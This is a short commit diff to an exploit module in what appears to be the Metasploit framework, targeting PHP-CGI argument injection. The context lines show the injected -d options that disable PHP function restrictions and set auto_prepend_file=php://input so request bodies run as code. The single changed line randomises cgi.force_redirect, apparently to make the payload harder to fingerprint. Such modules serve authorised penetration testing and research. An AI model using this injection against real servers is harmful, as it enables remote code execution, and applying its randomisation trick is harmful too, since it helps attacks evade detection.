Make the payload a bit more random

jvoisin · jvoisin · commit 028d4d607790 · 2017-02-08T09:59:22.000+01:00
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,7 +114,7 @@ def exploit
         create_arg("-d",'disable_functions=""'),
         create_arg("-d","open_basedir=none"),
         create_arg("-d","auto_prepend_file=php://input"),
-        create_arg("-d", "cgi.force_redirect=0"),
+        create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
         create_arg("-d", "cgi.redirect_status_env=0"),
         rand_opt_equiv("-n")
       ]

Original file line number	Diff line number	Diff line change
`@@ -114,7 +114,7 @@ def exploit`
`114`	`114`	`create_arg("-d",'disable_functions=""'),`
`115`	`115`	`create_arg("-d","open_basedir=none"),`
`116`	`116`	`create_arg("-d","auto_prepend_file=php://input"),`
`117`		`- create_arg("-d", "cgi.force_redirect=0"),`
	`117`	`+ create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),`
`118`	`118`	`create_arg("-d", "cgi.redirect_status_env=0"),`
`119`	`119`	`rand_opt_equiv("-n")`
`120`	`120`	`]`